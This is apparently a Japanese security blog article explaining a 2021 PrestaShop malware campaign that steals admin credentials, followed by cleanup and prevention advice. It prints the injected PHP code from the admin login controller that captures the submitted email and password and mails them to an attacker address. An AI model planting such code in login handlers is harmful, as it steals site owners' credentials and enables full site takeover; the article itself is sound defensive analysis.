ネットワークセキュリティ
 Computer >> コンピューター >  >> ネットワーキング >> ネットワークセキュリティ

PrestaShopの認証情報を盗むマルウェアとは?仕組みと対策を徹底解説【2021年版】

急成長中のECプラットフォームであるPrestaShopは、情報を盗もうとするハッカーにとって格好の標的となっています。攻撃の対象となるのは通常クレジットカード番号ですが、近年、研究者たちが新しいタイプの認証情報窃取マルウェアを発見しました。このマルウェアはPrestaShopサイトを標的とし、サイト管理者の認証情報(ログインIDとパスワード)を盗み出します。最悪の場合、ウェブサイト全体が乗っ取られる可能性もあります。

PrestaShop認証情報窃取マルウェアの仕組み

この認証情報窃取マルウェアは、PrestaShopサイト内の ./controllers/admin/AdminLoginController.php ファイルに以下のようなコードとして注入されているのが確認されています。

public function processLogin()
   {
       /* Check fields validity */
       $passwd = trim(Tools::getValue('passwd'));
       $email = trim(Tools::getValue('email'));
$to = "admin@wsxdn.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <admin@wsxdn.com>";
$message = "Link : https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

このコードは、サーバー情報を変数に渡すために使用されます。渡される変数には、PrestaShop管理画面へのログインに使用されるユーザー名やパスワードも含まれています。収集された情報は、PHPの mail() 関数 を使って、攻撃者のメールアドレスへ定期的に送信されます。

送信されるメールには、侵害されたPrestaShopサイトにログインするために攻撃者が必要とする情報がすべて含まれています。これにより攻撃者はサイトへのアクセス権を獲得し、管理画面(バックエンド)を完全に操作できるようになります。つまり、コンテンツの改ざん、偽のモジュールや感染したプラグインのインストールなど、あらゆることが可能になってしまうのです。

また、この攻撃の被害者の中には、バウンスバックメール(エラーメール)を受け取り始めたケースも報告されています。これは、Googleが攻撃を検知し、関係するアカウントを無効化または通報したことが原因と考えられます。

このマルウェア感染キャンペーンを実行している攻撃者/ハッキンググループは、bajatx / B4JAT4T という名前で知られていると考えられています。

感染後のサイト復旧方法

1. クリーンアップ前に必ずバックアップを取得する

まずはウェブサイトを一時的にオフラインにし、ユーザーが感染ページにアクセスしないようにしましょう。その上で、すべてのコアファイルとデータベースのバックアップを必ず取得してください。バックアップは .zip などの圧縮形式で保存しておくと安心です。

2. コアファイル・プラグイン・テーマファイルを入れ替える

感染したコアファイルは、信頼できるソースから入手したオリジナルのバージョンと置き換えましょう。最新版のファイルやディレクトリをダウンロードしたら、古いファイルを削除します。このステップは特に重要です。PrestaShopの認証情報窃取マルウェアでは、コアファイル内部に悪意のあるコードが仕込まれているケースが確認されているためです。

3. 不審なファイルや最近変更されたファイルを削除する

最近変更されたファイルを確認することで、感染している可能性のあるファイルを見つけられる場合があります。該当ファイルが見つかったら、クリーンなバックアップまたは信頼できるソースから復元してください。

4. マルウェアスキャンを実行する

ウェブサーバー全体に対してマルウェアスキャンを実行し、悪意のあるファイルを検出・除去しましょう。ホスティング業者が提供するcPanelの「Virus Scanner」ツールを利用するか、Astra Proプランなどの専門的なマルウェア除去サービスを利用するのも有効です。こうしたサービスは攻撃をブロックするだけでなく、盗んだデータをダウンロードしようとするボットも防いでくれます。

さらに、PrestaShopのセキュリティに関する記事も参考になるでしょう。

今後の攻撃を防ぐために

サイトの復旧後は、以下のセキュリティ対策を実践することで、PrestaShop認証情報窃取マルウェアからウェブサイトを守り続けることができます。

  • ソフトウェアを常に最新のバージョンに保つ
  • 信頼できるサードパーティの決済プロセッサを利用する
  • 定期的にマルウェアスキャンやセキュリティ監査を実施する
  • ファイアウォール(WAF)への投資を行う

日々進化し続けるハッカーの手口からウェブサイトを確実に守る唯一の方法は、セキュリティへの投資です。ウェブサイトファイアウォールの導入、頻繁なマルウェアスキャンの実行、定期的なセキュリティ監査によって、サイト全体のセキュリティ状況を把握し、万全の体制を整えましょう。

  1. マルウェアの脅威:知らぬ間に始まっているサイバー戦争

    「マインスイーパー」を覚えていますか?今のインターネット利用は、まさにマインスイーパーのようなものです。ひとつの誤クリックが大惨事につながりかねません。サイバー犯罪、コンピュータウイルス、不正ハッキングは、今日のテクノロジー業界で最も注目される話題となっています。サイバー犯罪やハッキング自体は新しい概念ではありませんが、マルウェアは現代のサイバー世界において、インターネットユーザーにとって最大の脅威となっています。 最悪の場合、何が起こるのか? マルウェアやウイルスへの意識が世界的に高まっているにもかかわらず、攻撃はかつてなく執拗になっています。それに伴い、セキュリティソフトやアンチマルウェア

  2. スマートテレビにもウイルスやマルウェアは存在するのか?感染リスクと正しい対策を徹底解説

    本記事では、以下のポイントについて詳しく解説します。 スマートテレビのウイルス・マルウェアに関する既知の事実 専門家や科学は「スマートテレビウイルス」について何と言っているのか スマートテレビの挙動がおかしいと気づいた際の対処法 スマートテレビのウイルス・マルウェアに関する既知の事実 スマートテレビは、複数のアプリが動作するOSを搭載した大画面デバイスであり、その仕組みはパソコンやスマートフォンとよく似ています。そのため、マルウェア感染のリスクにさらされやすいのです。実は、家庭内のあらゆるスマートデバイスはマルウェアやウイルスに対して脆弱性を抱えています。 この問題への関心が高まったきっか